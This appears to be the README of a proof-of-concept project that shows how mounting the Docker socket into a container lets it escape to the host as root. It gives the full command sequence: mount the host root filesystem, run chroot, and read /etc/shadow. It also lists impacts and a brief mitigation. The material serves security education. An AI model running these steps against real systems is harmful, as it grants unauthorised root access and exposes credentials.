π¨ A proof-of-concept showing how mounting
/var/run/docker.sockinto a container gives root access to the host.
This project demonstrates a critical Docker misconfiguration. By mounting the Docker Unix socket into a container, the container can communicate with the host Docker daemon β and effectively escape its sandbox, escalate privileges, and fully control the host.
β οΈ TL;DR
Mounting /var/run/docker.sock gives the container root-level access to the host.
π Project Structure
docker-sock-breakout/
βββ Dockerfile
βββ docker-compose.yml
βββ exploit.sh
π§ͺ How It Works
- A container is started with
-v /var/run/docker.sock:/var/run/docker.sock - Inside the container, Docker CLI is available
- We use Docker inside the container to run another container
- That second container mounts
/from the host and runschroot /host - Now weβre inside the host, as root
π Quick Start
1. Build and Run
git clone https://github.com/CyberSquirrel-AI/docker-sock-breakout.git
cd docker-sock-breakout
docker compose up -d
docker exec -it docker-sock-breakout sh
2. Inside the Container
docker ps
docker run -it --rm -v /:/host alpine
3. Inside the Alpine container
chroot /host
hostname
id
ls /root
cat /etc/shadow
π Impact
- Full host filesystem access
- Run arbitrary containers as
--privileged - Read sensitive files like
/etc/shadow,/root/.ssh/ - Install rootkits or persist on host
- Pivot to other containers, networks, volumes
π‘οΈ Mitigation
- β Do NOT mount
/var/run/docker.sockinto untrusted containers
β οΈ Disclaimer
This project is for educational purposes only. Do not run this on any system you don’t own or have permission to test. You are responsible for your actions.